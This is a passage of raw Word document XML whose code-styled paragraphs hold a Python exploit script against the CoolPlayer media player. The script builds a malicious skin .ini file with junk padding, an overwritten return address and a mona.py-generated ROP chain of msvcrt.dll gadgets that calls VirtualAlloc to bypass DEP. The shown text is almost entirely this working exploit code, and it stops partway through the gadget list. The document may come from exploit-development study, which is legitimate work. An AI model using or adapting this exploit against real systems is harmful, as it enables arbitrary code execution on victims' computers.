      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4231CAE4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">file= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"Ropchain.ini" , "w")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4160C0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>start="[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Skin]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>nPlaylistSkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66296A02" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>junk1 = "\x41" * 1045</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD4BAC6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>junk1 += "BB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450E14EC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>#eip = "AAAA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48457727" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>struct.pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>('&lt;I',0x77c11110)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8EFB5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>create_rop_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0810B2BF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A60183" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chain generated with mona.py - www.corelan.be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294B3F1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rop_gadgets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC7E49D"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_to_set_ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289A407D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ecef,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EBP # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A8D327" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ecef,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> skip 4 bytes [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B94D8B"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_to_set_ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0A730" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c4fa1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>c,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EBX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677AA02C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xffffffff,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F999D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c127e</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> INC EBX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C950FDF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c127e</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>5,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> INC EBX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8ED72B"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_to_set_edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE181E2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c34de</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EAX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45409F48" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0xa1bf4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>fcd,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> put delta into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-&gt; put 0x00001000 into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B6173" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>38081,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ADD EAX,5E40C033 # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A465FE1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c58</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>fbc,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> XCHG EAX,EDX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D9122D"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_to_set_ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9B4793" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>debf,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EAX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6215BC93" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x36ffff8</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>e,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> put delta into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-&gt; put 0x00000040 into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F03C00" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c4c78</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>a,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ADD EAX,C90000B2 # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793ABBB7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>14001,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> XCHG EAX,ECX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D405516"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_to_set_edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D25B5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c2e</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>942,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EDI # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C35C4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c47a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>42,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RETN (ROP NOP) [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01579612"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_to_set_esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1824D961" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c3b4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ed,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP ESI # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B4117D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>aacc,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> JMP [EAX] [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0FD70C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>52217,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EAX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB98F12" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c1110</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>c,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ptr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>() [IAT msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B289B9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      #[---</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>INFO:pushad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A2C24" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c12df</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>9,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PUSHAD # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5C21D2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      #[---</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>INFO:extras</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A3D5F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>35459,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ptr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to 'push </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
